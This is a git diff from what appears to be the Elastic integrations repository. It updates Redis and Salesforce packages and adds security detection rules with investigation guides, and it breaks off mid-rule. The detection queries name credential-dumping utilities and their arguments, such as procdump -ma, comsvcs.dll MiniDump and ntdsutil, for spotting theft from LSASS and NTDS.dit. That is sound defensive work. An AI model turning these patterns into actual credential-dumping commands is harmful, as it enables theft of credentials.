@@ -759,7 +790,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "7dd18b64-cbba-40ed-b1e3-56aa0f27f3f3": { "columnOrder": [ @@ -810,16 +841,18 @@ "layers": [ { "categoryDisplay": "default", - "groups": [ - "cfccf32e-014a-43c4-b8f5-7bcc29ce6e46" - ], "layerId": "7dd18b64-cbba-40ed-b1e3-56aa0f27f3f3", "layerType": "data", "legendDisplay": "show", "legendSize": "auto", - "metric": "a2c1d752-9b78-45b8-ae86-f71e48c5fee1", "nestedLegend": false, - "numberDisplay": "percent" + "numberDisplay": "percent", + "primaryGroups": [ + "cfccf32e-014a-43c4-b8f5-7bcc29ce6e46" + ], + "metrics": [ + "a2c1d752-9b78-45b8-ae86-f71e48c5fee1" + ] } ], "palette": { @@ -833,30 +866,16 @@ "type": "lens", "visualizationType": "lnsPie" }, - "enhancements": {} + "enhancements": {}, + "type": "lens" }, - "gridData": { - "h": 8, - "i": "eed90cad-e313-4af5-b26b-965cfc02ea24", - "w": 16, - "x": 32, - "y": 22 - }, - "panelIndex": "eed90cad-e313-4af5-b26b-965cfc02ea24", - "title": "Multiplexing API [Metrics Redis]", - "type": "lens", - "version": "8.3.0" + "title": "Multiplexing API [Metrics Redis]" } ], "timeRestore": false, "title": "[Metrics Redis] Overview", "version": 1 }, - "coreMigrationVersion": "8.3.0", - "id": "redis-AV4YjZ5pux-M-tCAunxK", - "migrationVersion": { - "dashboard": "8.3.0" - }, "references": [ { "id": "metrics-*", @@ -919,5 +938,7 @@ "type": "index-pattern" } ], - "type": "dashboard" + "managed": false, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/redis/kibana/search/redis-0ab87b80-478e-11e7-b1f0-cb29bac6bf8b.json b/packages/redis/kibana/search/redis-0ab87b80-478e-11e7-b1f0-cb29bac6bf8b.json deleted file mode 100644 index 22115ed4d52..00000000000 --- a/packages/redis/kibana/search/redis-0ab87b80-478e-11e7-b1f0-cb29bac6bf8b.json +++ /dev/null @@ -1,45 +0,0 @@ -{ - "attributes": { - "columns": [ - "host.name", - "message", - "redis.slowlog.duration.us", - "redis.slowlog.key" - ], - "description": "", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "highlightAll": true, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", - "query": { - "language": "kuery", - "query": "data_stream.dataset:redis.slowlog" - }, - "version": true - } - }, - "sort": [ - [ - "@timestamp", - "desc" - ] - ], - "title": "Slow logs [Logs Redis]", - "version": 1 - }, - "coreMigrationVersion": "8.8.0", - "created_at": "2023-10-23T06:20:05.818Z", - "id": "redis-0ab87b80-478e-11e7-b1f0-cb29bac6bf8b", - "managed": true, - "references": [ - { - "id": "logs-*", - "name": "kibanaSavedObjectMeta.searchSourceJSON.index", - "type": "index-pattern" - } - ], - "type": "search", - "typeMigrationVersion": "8.0.0" -} \ No newline at end of file diff --git a/packages/redis/manifest.yml b/packages/redis/manifest.yml index 1bf0446ef23..e93a6b76af9 100644 --- a/packages/redis/manifest.yml +++ b/packages/redis/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: redis title: Redis -version: "1.13.0" +version: "1.14.0" description: Collect logs and metrics from Redis servers with Elastic Agent. type: integration categories: @@ -9,7 +9,7 @@ categories: - observability conditions: kibana: - version: "^8.10.2" + version: "^8.12.0" elastic: subscription: basic screenshots: @@ -75,6 +75,7 @@ policy_templates: - name: password type: password title: Password + secret: true multi: false required: false show_user: false diff --git a/packages/salesforce/_dev/build/docs/README.md b/packages/salesforce/_dev/build/docs/README.md index 4caa956ba46..2d7b27e94df 100644 --- a/packages/salesforce/_dev/build/docs/README.md +++ b/packages/salesforce/_dev/build/docs/README.md @@ -188,91 +188,7 @@ If the error continues follow these steps: ### Missing old events in **Login events table** panel -If **Login events table** does not display older documents after upgrading to ``0.8.0`` or later versions, then this issue can be solved by reindexing the ``login_rest`` data stream's indices. - -To reindex the data, the following steps must be performed. - -1. Stop the data stream by going to `Integrations -> Salesforce -> Integration policies` open the configuration of Salesforce and disable the `Salesforce Login logs` toggle to reindex ``login_rest`` data stream and save the integration. - -2. Copy data into the temporary index by performing the following steps in the Dev tools. - -``` -POST _reindex -{ - "source": { - "index": "" - }, - "dest": { - "index": "temp_index" - } -} -``` -Example: -``` -POST _reindex -{ - "source": { - "index": "logs-salesforce.login_rest-default" - }, - "dest": { - "index": "temp_index" - } -} -``` - -3. Delete the existing data stream and index template by performing the following steps in the Dev tools. - -``` -DELETE /_data_stream/ -DELETE _index_template/ -``` -Example: -``` -DELETE /_data_stream/logs-salesforce.login_rest-default -DELETE _index_template/logs-salesforce.login_rest -``` - -4. Go to `Integrations -> Salesforce -> Settings` and click on `Reinstall Salesforce`. - -5. Copy data from temporary index to new index by performing the following steps in the Dev tools. - -``` -POST _reindex -{ - "source": { - "index": "temp_index" - }, - "dest": { - "index": "", - "op_type": "create" - } -} -``` -Example: -``` -POST _reindex -{ - "source": { - "index": "temp_index" - }, - "dest": { - "index": "logs-salesforce.login_rest-default", - "op_type": "create" - } -} -``` - -6. Verify data is reindexed completely. - -7. Start the data stream by going to the `Integrations -> Salesforce -> Integration policies` and open configuration of integration and enable the `Salesforce Login logs` toggle. - -8. Delete temporary index by performing the following step in the Dev tools. - -``` -DELETE temp_index -``` - -More details about reindexing can be found [here](https://www.elastic.co/guide/en/elasticsearch/reference/current/docs-reindex.html). +If **Login events table** does not display older documents after upgrading to ``0.8.0`` or later versions, this issue can be resolved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/use-a-data-stream.html#reindex-with-a-data-stream) the ``login_rest`` data stream. ## Logs reference diff --git a/packages/salesforce/changelog.yml b/packages/salesforce/changelog.yml index 65c98a80709..428fcb7c8c8 100644 --- a/packages/salesforce/changelog.yml +++ b/packages/salesforce/changelog.yml @@ -1,4 +1,24 @@ # newer versions go on top +- version: "0.14.1" + changes: + - description: Update README with reindexing steps. + type: enhancement + link: https://github.com/elastic/integrations/pull/9529 +- version: 0.14.0 + changes: + - description: Enable secrets for sensitive fields. For more details, refer https://www.elastic.co/guide/en/fleet/current/agent-policy.html#agent-policy-secret-values + type: enhancement + link: https://github.com/elastic/integrations/pull/9321 +- version: "0.13.1" + changes: + - description: Disable secrets for older stack versions due to errors. + type: bugfix + link: https://github.com/elastic/integrations/pull/9279 +- version: "0.13.0" + changes: + - description: Enable 'secret' for the sensitive fields, supported from 8.12. + type: enhancement + link: https://github.com/elastic/integrations/pull/9009 - version: "0.12.1" changes: - description: Add null and ignore_missing check to handle event.original field. diff --git a/packages/salesforce/docs/README.md b/packages/salesforce/docs/README.md index 89e8145df5c..d9633ca1470 100644 --- a/packages/salesforce/docs/README.md +++ b/packages/salesforce/docs/README.md @@ -188,91 +188,7 @@ If the error continues follow these steps: ### Missing old events in **Login events table** panel -If **Login events table** does not display older documents after upgrading to ``0.8.0`` or later versions, then this issue can be solved by reindexing the ``login_rest`` data stream's indices. - -To reindex the data, the following steps must be performed. - -1. Stop the data stream by going to `Integrations -> Salesforce -> Integration policies` open the configuration of Salesforce and disable the `Salesforce Login logs` toggle to reindex ``login_rest`` data stream and save the integration. - -2. Copy data into the temporary index by performing the following steps in the Dev tools. - -``` -POST _reindex -{ - "source": { - "index": "" - }, - "dest": { - "index": "temp_index" - } -} -``` -Example: -``` -POST _reindex -{ - "source": { - "index": "logs-salesforce.login_rest-default" - }, - "dest": { - "index": "temp_index" - } -} -``` - -3. Delete the existing data stream and index template by performing the following steps in the Dev tools. - -``` -DELETE /_data_stream/ -DELETE _index_template/ -``` -Example: -``` -DELETE /_data_stream/logs-salesforce.login_rest-default -DELETE _index_template/logs-salesforce.login_rest -``` - -4. Go to `Integrations -> Salesforce -> Settings` and click on `Reinstall Salesforce`. - -5. Copy data from temporary index to new index by performing the following steps in the Dev tools. - -``` -POST _reindex -{ - "source": { - "index": "temp_index" - }, - "dest": { - "index": "", - "op_type": "create" - } -} -``` -Example: -``` -POST _reindex -{ - "source": { - "index": "temp_index" - }, - "dest": { - "index": "logs-salesforce.login_rest-default", - "op_type": "create" - } -} -``` - -6. Verify data is reindexed completely. - -7. Start the data stream by going to the `Integrations -> Salesforce -> Integration policies` and open configuration of integration and enable the `Salesforce Login logs` toggle. - -8. Delete temporary index by performing the following step in the Dev tools. - -``` -DELETE temp_index -``` - -More details about reindexing can be found [here](https://www.elastic.co/guide/en/elasticsearch/reference/current/docs-reindex.html). +If **Login events table** does not display older documents after upgrading to ``0.8.0`` or later versions, this issue can be resolved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/use-a-data-stream.html#reindex-with-a-data-stream) the ``login_rest`` data stream. ## Logs reference diff --git a/packages/salesforce/manifest.yml b/packages/salesforce/manifest.yml index 80786f71851..ef124ab7692 100644 --- a/packages/salesforce/manifest.yml +++ b/packages/salesforce/manifest.yml @@ -1,7 +1,7 @@ -format_version: 3.0.0 +format_version: 3.0.2 name: salesforce title: Salesforce -version: "0.12.1" +version: "0.14.1" description: Collect logs from Salesforce with Elastic Agent. type: integration categories: @@ -10,7 +10,7 @@ conditions: elastic: subscription: basic kibana: - version: ^8.7.1 + version: ^8.12.0 screenshots: - src: /img/salesforce-login.png title: Salesforce Login Dashboard @@ -53,6 +53,7 @@ vars: title: Client Secret description: OAuth 2.0 client secret. required: true + secret: true show_user: true default: client_secret - name: username @@ -65,6 +66,7 @@ vars: - name: password type: password title: Password + secret: true description: The password used as part of the authentication flow. required: true show_user: true @@ -72,6 +74,7 @@ vars: - name: token_url type: text title: Token URL + secret: false description: The OAuth 2.0 token URL for Salesforce. required: true show_user: false diff --git a/packages/santa/_dev/deploy/docker/sample_logs/santa.log b/packages/santa/_dev/deploy/docker/sample_logs/santa.log index 359df8289bc..32380c45e0e 100644 --- a/packages/santa/_dev/deploy/docker/sample_logs/santa.log +++ b/packages/santa/_dev/deploy/docker/sample_logs/santa.log @@ -8,4 +8,4 @@ [2022-05-12T11:32:44.184Z] I santad: action=DISKAPPEAR|mount=/Volumes/GoogleDrive|volume=Google Drive|bsdname=|fs=smbfs|model=|serial=(null)|bus=|dmgpath=|appearance=2001-01-01T00:00:00.000Z [2022-05-12T11:33:57.166Z] I santad: action=DISKAPPEAR|mount=|volume=Install Google Drive|bsdname=disk4s2|fs=hfs|model=Apple Disk Image|serial=|bus=Virtual Interface|dmgpath=|appearance=2022-05-12T11:33:57.043Z [2022-05-12T11:33:57.235Z] I santad: action=DISKAPPEAR|mount=/Volumes/Install Google Drive|volume=Install Google Drive|bsdname=disk4s2|fs=hfs|model=Apple Disk Image|serial=|bus=Virtual Interface|dmgpath=|appearance=2022-05-12T11:33:57.043Z -[2022-05-12T11:35:31.436Z] I santad: action=DISKDISAPPEAR|mount=|volume=Install Google Drive|bsdname=disk4s2 \ No newline at end of file +[2022-05-12T11:35:31.436Z] I santad: action=DISKDISAPPEAR|mount=|volume=Install Google Drive|bsdname=disk4s2 diff --git a/packages/santa/changelog.yml b/packages/santa/changelog.yml index fa483336718..f70e6126a03 100644 --- a/packages/santa/changelog.yml +++ b/packages/santa/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "3.17.0" + changes: + - description: Update manifest format version to v3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9403 - version: "3.16.2" changes: - description: Changed owners diff --git a/packages/santa/data_stream/log/_dev/test/system/test-default-config.yml b/packages/santa/data_stream/log/_dev/test/system/test-default-config.yml index 25b18bc7ae8..177d8c1b1af 100644 --- a/packages/santa/data_stream/log/_dev/test/system/test-default-config.yml +++ b/packages/santa/data_stream/log/_dev/test/system/test-default-config.yml @@ -3,3 +3,5 @@ data_stream: vars: paths: - "{{SERVICE_LOGS_DIR}}/santa.log" +assert: + hit_count: 11 diff --git a/packages/santa/manifest.yml b/packages/santa/manifest.yml index d8a761aa449..242cda09914 100644 --- a/packages/santa/manifest.yml +++ b/packages/santa/manifest.yml @@ -1,13 +1,13 @@ name: santa title: Google Santa -version: "3.16.2" +version: "3.17.0" description: Collect logs from Google Santa with Elastic Agent. type: integration icons: - src: /img/icon.svg title: Google Santa type: image/svg+xml -format_version: "3.0.0" +format_version: "3.0.3" categories: - security conditions: diff --git a/packages/security_detection_engine/changelog.yml b/packages/security_detection_engine/changelog.yml index 8d04983a4c6..76f2ddcb157 100644 --- a/packages/security_detection_engine/changelog.yml +++ b/packages/security_detection_engine/changelog.yml @@ -1,5 +1,55 @@ # newer versions go on top # NOTE: please use pre-release versions (e.g. -beta.0) until a package is ready for production +- version: 8.13.3 + changes: + - description: Release security rules update + type: enhancement + link: https://github.com/elastic/integrations/pull/9507 +- version: 8.13.3-beta.1 + changes: + - description: Release security rules update + type: enhancement + link: https://github.com/elastic/integrations/pull/9497 +- version: 8.13.2 + changes: + - description: Release security rules update + type: enhancement + link: https://github.com/elastic/integrations/pull/9421 +- version: 8.13.2-beta.1 + changes: + - description: Release security rules update + type: enhancement + link: https://github.com/elastic/integrations/pulls/9412 +- version: 8.13.1 + changes: + - description: Release security rules update + type: enhancement + link: https://github.com/elastic/integrations/pull/9301 +- version: 8.13.1-beta.1 + changes: + - description: Release security rules update + type: enhancement + link: https://github.com/elastic/integrations/pull/9284 +- version: 8.12.5 + changes: + - description: Release security rules update + type: enhancement + link: https://github.com/elastic/integrations/pull/9218 +- version: 8.12.5-beta.1 + changes: + - description: Release security rules update + type: enhancement + link: https://github.com/elastic/integrations/pull/9207 +- version: 8.12.4 + changes: + - description: Release security rules update + type: enhancement + link: https://github.com/elastic/integrations/pull/9099 +- version: 8.12.4-beta.1 + changes: + - description: Release security rules update + type: enhancement + link: https://github.com/elastic/integrations/pull/9094 - version: 8.12.3 changes: - description: Release security rules update diff --git a/packages/security_detection_engine/kibana/security_rule/00140285-b827-4aee-aa09-8113f58a08f3_111.json b/packages/security_detection_engine/kibana/security_rule/00140285-b827-4aee-aa09-8113f58a08f3_111.json new file mode 100644 index 00000000000..0a8c97b3479 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/00140285-b827-4aee-aa09-8113f58a08f3_111.json @@ -0,0 +1,141 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of known Windows utilities often abused to dump LSASS memory or the Active Directory database (NTDS.dit) in preparation for credential access.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Credential Access via Windows Utilities", + "note": "## Triage and analysis\n\n### Investigating Potential Credential Access via Windows Utilities\n\nLocal Security Authority Server Service (LSASS) is a process in Microsoft Windows operating systems that is responsible for enforcing security policy on the system. It verifies users logging on to a Windows computer or server, handles password changes, and creates access tokens.\n\nThe `Ntds.dit` file is a database that stores Active Directory data, including information about user objects, groups, and group membership.\n\nThis rule looks for the execution of utilities that can extract credential data from the LSASS memory and Active Directory `Ntds.dit` file.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to identify what information was targeted.\n- Identify the target computer and its role in the IT environment.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- If the host is a domain controller (DC):\n - Activate your incident response plan for total Active Directory compromise.\n - Review the privileges assigned to users that can access the DCs, to ensure that the least privilege principle is being followed and to reduce the attack surface.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n(\n (\n (?process.pe.original_file_name : \"procdump\" or process.name : \"procdump.exe\") and process.args : \"-ma\"\n ) or\n (\n process.name : \"ProcessDump.exe\" and not process.parent.executable regex~ \"\"\"C:\\\\Program Files( \\(x86\\))?\\\\Cisco Systems\\\\.*\"\"\"\n ) or\n (\n (?process.pe.original_file_name : \"WriteMiniDump.exe\" or process.name : \"WriteMiniDump.exe\") and\n not process.parent.executable regex~ \"\"\"C:\\\\Program Files( \\(x86\\))?\\\\Steam\\\\.*\"\"\"\n ) or\n (\n (?process.pe.original_file_name : \"RUNDLL32.EXE\" or process.name : \"RUNDLL32.exe\") and\n (process.args : \"MiniDump*\" or process.command_line : \"*comsvcs.dll*#24*\")\n ) or\n (\n (?process.pe.original_file_name : \"RdrLeakDiag.exe\" or process.name : \"RdrLeakDiag.exe\") and\n process.args : \"/fullmemdmp\"\n ) or\n (\n (?process.pe.original_file_name : \"SqlDumper.exe\" or process.name : \"SqlDumper.exe\") and\n process.args : \"0x01100*\") or\n (\n (?process.pe.original_file_name : \"TTTracer.exe\" or process.name : \"TTTracer.exe\") and\n process.args : \"-dumpFull\" and process.args : \"-attach\") or\n (\n (?process.pe.original_file_name : \"ntdsutil.exe\" or process.name : \"ntdsutil.exe\") and\n process.args : \"create*full*\") or\n (\n (?process.pe.original_file_name : \"diskshadow.exe\" or process.name : \"diskshadow.exe\") and process.args : \"/s\")\n)\n", + "references": [ + "https://lolbas-project.github.io/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "00140285-b827-4aee-aa09-8113f58a08f3", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.001", + "name": "LSASS Memory", + "reference": "https://attack.mitre.org/techniques/T1003/001/" + }, + { + "id": "T1003.003", + "name": "NTDS", + "reference": "https://attack.mitre.org/techniques/T1003/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/", + "subtechnique": [ + { + "id": "T1218.011", + "name": "Rundll32", + "reference": "https://attack.mitre.org/techniques/T1218/011/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "00140285-b827-4aee-aa09-8113f58a08f3_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/00140285-b827-4aee-aa09-8113f58a08f3_112.json b/packages/security_detection_engine/kibana/security_rule/00140285-b827-4aee-aa09-8113f58a08f3_112.json new file mode 100644 index 00000000000..0a9f7b2cebc --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/00140285-b827-4aee-aa09-8113f58a08f3_112.json @@ -0,0 +1,141 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of known Windows utilities often abused to dump LSASS memory or the Active Directory database (NTDS.dit) in preparation for credential access.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Credential Access via Windows Utilities", + "note": "## Triage and analysis\n\n### Investigating Potential Credential Access via Windows Utilities\n\nLocal Security Authority Server Service (LSASS) is a process in Microsoft Windows operating systems that is responsible for enforcing security policy on the system. It verifies users logging on to a Windows computer or server, handles password changes, and creates access tokens.\n\nThe `Ntds.dit` file is a database that stores Active Directory data, including information about user objects, groups, and group membership.\n\nThis rule looks for the execution of utilities that can extract credential data from the LSASS memory and Active Directory `Ntds.dit` file.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to identify what information was targeted.\n- Identify the target computer and its role in the IT environment.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- If the host is a domain controller (DC):\n - Activate your incident response plan for total Active Directory compromise.\n - Review the privileges assigned to users that can access the DCs, to ensure that the least privilege principle is being followed and to reduce the attack surface.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n(\n (\n (?process.pe.original_file_name : \"procdump\" or process.name : \"procdump.exe\") and process.args : \"-ma\"\n ) or\n (\n process.name : \"ProcessDump.exe\" and not process.parent.executable regex~ \"\"\"C:\\\\Program Files( \\(x86\\))?\\\\Cisco Systems\\\\.*\"\"\"\n ) or\n (\n (?process.pe.original_file_name : \"WriteMiniDump.exe\" or process.name : \"WriteMiniDump.exe\") and\n not process.parent.executable regex~ \"\"\"C:\\\\Program Files( \\(x86\\))?\\\\Steam\\\\.*\"\"\"\n ) or\n (\n (?process.pe.original_file_name : \"RUNDLL32.EXE\" or process.name : \"RUNDLL32.exe\") and\n (process.args : \"MiniDump*\" or process.command_line : \"*comsvcs.dll*#24*\")\n ) or\n (\n (?process.pe.original_file_name : \"RdrLeakDiag.exe\" or process.name : \"RdrLeakDiag.exe\") and\n process.args : \"/fullmemdmp\"\n ) or\n (\n (?process.pe.original_file_name : \"SqlDumper.exe\" or process.name : \"SqlDumper.exe\") and\n process.args : \"0x01100*\") or\n (\n (?process.pe.original_file_name : \"TTTracer.exe\" or process.name : \"TTTracer.exe\") and\n process.args : \"-dumpFull\" and process.args : \"-attach\") or\n (\n (?process.pe.original_file_name : \"ntdsutil.exe\" or process.name : \"ntdsutil.exe\") and\n process.args : \"create*full*\") or\n (\n (?process.pe.original_file_name : \"diskshadow.exe\" or process.name : \"diskshadow.exe\") and process.args : \"/s\")\n)\n", + "references": [ + "https://lolbas-project.github.io/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "00140285-b827-4aee-aa09-8113f58a08f3", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.001", + "name": "LSASS Memory", + "reference": "https://attack.mitre.org/techniques/T1003/001/" + }, + { + "id": "T1003.003", + "name": "NTDS", + "reference": "https://attack.mitre.org/techniques/T1003/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/", + "subtechnique": [ + { + "id": "T1218.011", + "name": "Rundll32", + "reference": "https://attack.mitre.org/techniques/T1218/011/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 112 + }, + "id": "00140285-b827-4aee-aa09-8113f58a08f3_112", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0022d47d-39c7-4f69-a232-4fe9dc7a3acd_110.json b/packages/security_detection_engine/kibana/security_rule/0022d47d-39c7-4f69-a232-4fe9dc7a3acd_110.json new file mode 100644 index 00000000000..4096fd43f26 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0022d47d-39c7-4f69-a232-4fe9dc7a3acd_110.json @@ -0,0 +1,131 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Windows services typically run as SYSTEM and can be used as a privilege escalation opportunity. Malware or penetration testers may run a shell as a service to gain SYSTEM permissions.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "System Shells via Services", + "note": "## Triage and analysis\n\n### Investigating System Shells via Services\n\nAttackers may configure existing services or create new ones to execute system shells to elevate their privileges from administrator to SYSTEM. They can also configure services to execute these shells with persistence payloads.\n\nThis rule looks for system shells being spawned by `services.exe`, which is compatible with the above behavior.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify how the service was created or modified. Look for registry changes events or Windows events related to service activities (for example, 4697 and/or 7045).\n - Examine the created and existent services, the executables or drivers referenced, and command line arguments for suspicious entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the referenced files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of 